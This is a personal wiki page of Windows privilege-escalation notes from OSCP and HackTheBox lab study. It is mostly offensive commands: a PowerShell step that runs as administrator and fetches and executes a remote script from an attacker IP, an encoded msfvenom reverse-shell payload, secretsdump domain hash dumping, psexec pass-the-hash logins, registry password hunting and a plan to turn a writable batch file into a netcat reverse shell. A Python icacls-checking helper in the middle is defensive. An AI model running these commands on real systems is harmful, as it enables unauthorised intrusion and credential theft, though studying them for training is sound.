
Windows Privilege Escalation

Alvin Smith edited this page Mar 27, 2024 · 46 revisions

Fix PATH variable

set PATH=%SystemRoot%\system32;%SystemRoot%;

Quick wins (and possibly Responder)

whoami /priv

tasklist /svc

Use Responder when you can trigger or poison a service that makes other users act on it, e.g. an SMB attack.

Find creds or scripts

C:\Users>dir /S /B *.ps1

The /S switch lists files recursively (including sub-directories).
The /B switch displays only the file names without additional information.

Get-ChildItem -Recurse -Filter nc.exe

Constrained Language mode

Scheduled Tasks

Bypass a restricted set of privileges

Fodhelper

  • PEN-300 Advanced Antivirus Evasion

Privilege Escalation Abusing Tokens that HTB Academy missed

SeBackupPrivilege

SeRestorePrivilege

SeManageVolumePrivilege

https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Access#escalation

AD Recycle Bin Group

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-accounts-and-token-privileges#ad-recycle-bin

Manual credential hunting

reg query HKLM /f pass /t REG_SZ /s

https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Meathead

Switch to administrator with a password

It's bizarre: on Linux this is just su - root with the password (pw: Welcome1!), but on Windows you have to spawn another shell as that user instead:

# wrap the known password in a credential object for the administrator account
$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('administrator',$passwd)
# start a new PowerShell process as administrator that fetches and runs the second-stage script
Start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.9/shell2.ps1')" -Credential $creds

Look into Program Files for interesting files

  • Program Files
  • Program Files (x86)
  • C:\ <- root level

Run icacls on interesting files

icacls job.bat

https://app.hackthebox.com/machines/Markup/walkthroughs

TY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

Looking at the permissions of job.bat using icacls reveals that the group BUILTIN\Users has full control (F) over the file. The BUILTIN\Users group represents all local users, which includes Daniel as well. We might be able to get a shell by transferring netcat to the system and modifying the script to execute a reverse shell.
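The permission check above, as an added example that is not part of the original page: a small Python parser for icacls output that flags files a broad group (BUILTIN\Users, Everyone, Authenticated Users) can modify, which is the condition that turns a script run by a higher-privileged task or service into an escalation path. The two file paths and their icacls output are constructed for the example.

```python
import re

# icacls output for two hypothetical scripts, constructed for this example (not from the page).
SAMPLE_JOB = """\
C:\\Apps\\job.bat NT AUTHORITY\\SYSTEM:(I)(F)
                 BUILTIN\\Administrators:(I)(F)
                 BUILTIN\\Users:(F)

Successfully processed 1 files; Failed processing 0 files
"""
SAMPLE_BACKUP = """\
C:\\Apps\\backup.ps1 NT AUTHORITY\\SYSTEM:(I)(F)
                    BUILTIN\\Administrators:(I)(F)
                    BUILTIN\\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals every local or authenticated user belongs to, i.e. what a low-privilege foothold has.
BROAD_PRINCIPALS = {"builtin\\users", "everyone", "nt authority\\authenticated users"}
# Simple rights (F, M, W, D) and specific rights (WD, AD, WA, ...) that let the holder change the file.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}   # inheritance flags, e.g. the (I) in (I)(F)

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^()]*\))+)$")

def parse_icacls(path, output):
    """Return [(principal, set_of_rights), ...] from the output of `icacls <path>`."""
    aces = []
    for line in output.splitlines():
        text = line.strip()
        if not text or text.startswith("Successfully processed"):
            continue
        if text.startswith(path):            # first line: the path precedes the first ACE
            text = text[len(path):].strip()
        m = ACE_RE.match(text)
        if not m:
            continue
        groups = re.findall(r"\(([^()]*)\)", m.group("flags"))
        # a group may hold several comma-separated specific rights, e.g. (RX,W)
        rights = {r for g in groups if g not in INHERIT_FLAGS for r in g.split(",")}
        aces.append((m.group("principal"), rights))
    return aces

def broad_writers(path, output):
    """Broad principals that can modify `path`; non-empty means the file's ACL is weak."""
    return sorted(p for p, rights in parse_icacls(path, output)
                  if p.lower() in BROAD_PRINCIPALS and rights & WRITE_RIGHTS)
```

Feeding it the output of icacls for each script found with dir /S /B gives a list of files to either harden (remove the broad write ACE) or monitor for modification.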

Windows equivalent of chmod +r root.txt

icacls root.txt /grant alfred:F

mimikatz

https://github.com/A1vinSmith/OSCP-PWK/blob/master/HackTheBox/Academy/AD%20Enumeration%20%26%20Attacks/Skills%20Assessment%20Part%20II.md#alternatively-back-to-the-mimikatz-session

Weaponizing for privileged file writes

When you have at least write permission on the Windows folder

Counterpart on Linux

https://steflan-security.com/linux-privilege-escalation-writable-passwd-file/

Links and cheatsheets

USOSVC

https://0xdf.gitlab.io/2020/02/01/htb-re.html#path-1-abuse-usosvc

Domain Controller backup account credentials (Impacket)

This account has a unique permission that allows all Active Directory changes to be synced to it, including password hashes. Impacket's secretsdump.py uses that to retrieve every password hash this account (synced with the domain controller) has to offer. Exploiting this, we effectively have full control over the AD domain.

sudo python3 secretsdump.py spookysec.local/user@spookysec.local # spookysec.local is the domain here
sudo python3 secretsdump.py user@spookysec.local # the domain prefix can also be omitted

Login with full control of the AD Domain (Impacket)

python3 psexec.py user@spookysec.local -hashes LMHASH:NTHASH

Login with credentials

python3 psexec.py Domain/user:pass@spookysec.local
or
python3 psexec.py Domain/user:pass@IP

Alternative tool: evil-winrm https://github.com/Hackplayers/evil-winrm

With Metasploit

upload shell_path/shell_name
load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.22.145 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe

Without Metasploit

Use SimpleHTTPServer, netcat and the payload to get the shell, then PowerShell and winPEAS for the escalation.

powershell -c "Invoke-WebRequest -Uri http://10.4.3.98:8910/winPEAS.exe -OutFile winPEAS.exe"
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://10.4.3.98:8910/winPEAS.exe"
powershell -c wget "http://10.4.3.98/winPEAS.exe" -outfile "winPEAS.exe"

Others

Mimikatz

Look up registry values

Reg Query "HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat" /s

https://www.addictivetips.com/windows-tips/look-up-registry-values-from-command-prompt-on-windows-10/

Hacking with Powershell

https://github.com/A1vinSmith/OSCP-PWK/blob/5fa998f0b96e3f541e265a6640e63d540a72ca99/TryHackMe/Hacking%20with%20Powershell.md


Automated Script

https://www.hackingarticles.in/window-privilege-escalation-automated-script/

  • WinPEAS
  • Seatbelt
  • SharpUp
  • JAWS – Just Another Windows (Enum) Script
  • PowerUp
  • Powerless

Metasploit:

  • Windows-Exploit-Suggester
  • Sherlock
  • WinPEAS/SharpUp/Seatbelt

PowerShell Empire:

  • WinPEAS
  • PowerUp
  • Sherlock
  • Watson
  • Privesccheck